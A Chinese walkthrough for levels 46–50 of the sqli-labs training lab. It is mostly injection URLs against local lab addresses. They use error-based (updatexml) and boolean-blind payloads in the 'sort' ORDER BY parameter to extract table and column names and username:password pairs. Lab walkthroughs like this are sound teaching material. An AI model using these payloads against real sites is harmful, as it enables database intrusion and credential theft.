sql-labs46-50通关攻略

第46关

一.查询数据库

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+

二.查表

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+

三.查列

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+

四.查user表里数据

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20substring(group_concat(username,%27:%27,password),1,32)%20from%20users%20),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20substring(group_concat(username,%27:%27,password),1,32)%20from%20users%20),0x7e),1)--+#substring

第47关

一.查询数据库

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--+

二.查表

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+

三.查列

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+

四.查询user表中数据

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)--+

第48关

使用布尔盲注

一.查询数据库长度

http://127.0.0.1/Less-48/?sort=rand(length(database())=8)http://127.0.0.1/Less-48/?sort=rand(length(database())=8)

数据库长度为8

二.查询数据库命第一个字符

http://127.0.0.1/Less-48/?sort=rand(ascii(mid(database(),1,1))=101)http://127.0.0.1/Less-48/?sort=rand(ascii(mid(database(),1,1))=101)

ascii码 为101第一个字符为s

........接着往后查回查出数据库为'security'

三.查表格个数

http://127.0.0.1/Less-48/?sort=rand((select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=4)http://127.0.0.1/Less-48/?sort=rand((select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=4)

说明数据库里有四个表格

四.第一个表格的名称的首字母

http://127.0.0.1/Less-48/?sort=rand(ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101)http://127.0.0.1/Less-48/?sort=rand(ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101)

说明第一个表的字符为e

后面数据查询,同上

第49关

同48关

区别:字符型,需要用 ' 闭合

第50关

一.查询数据库

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,database(),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,database(),0x7e),1)

二.查表

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)

三.查列

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)

四.查询user表中数据

http://127.0.0.1/Less-50/?sort=updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)http://127.0.0.1/Less-50/?sort=updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)

相关推荐
feifeigo12321 分钟前
升级到MySQL 8.4,MySQL启动报错:io_setup() failed with EAGAIN
数据库·mysql·adb
火龙谷2 小时前
【nosql】有哪些非关系型数据库?
数据库·nosql
焱焱枫3 小时前
Oracle获取执行计划之10046 技术详解
数据库·oracle
qq_392397124 小时前
Redis常用操作
数据库·redis·wpf
一只fish6 小时前
MySQL 8.0 OCP 1Z0-908 题目解析(17)
数据库·mysql
花好月圆春祺夏安6 小时前
基于odoo17的设计模式详解---装饰模式
数据库·python·设计模式
A__tao6 小时前
SQL 转 Java 实体类工具
java·数据库·sql
m0_653031367 小时前
腾讯云认证考试报名 - TDSQL数据库交付运维专家(TCCE PostgreSQL版)
运维·数据库·腾讯云
小马哥编程7 小时前
【iSAQB软件架构】架构决策记录-ADR
数据库·架构·系统架构·设计规范
萧鼎8 小时前
深度探索 Py2neo:用 Python 玩转图数据库 Neo4j
数据库·python·neo4j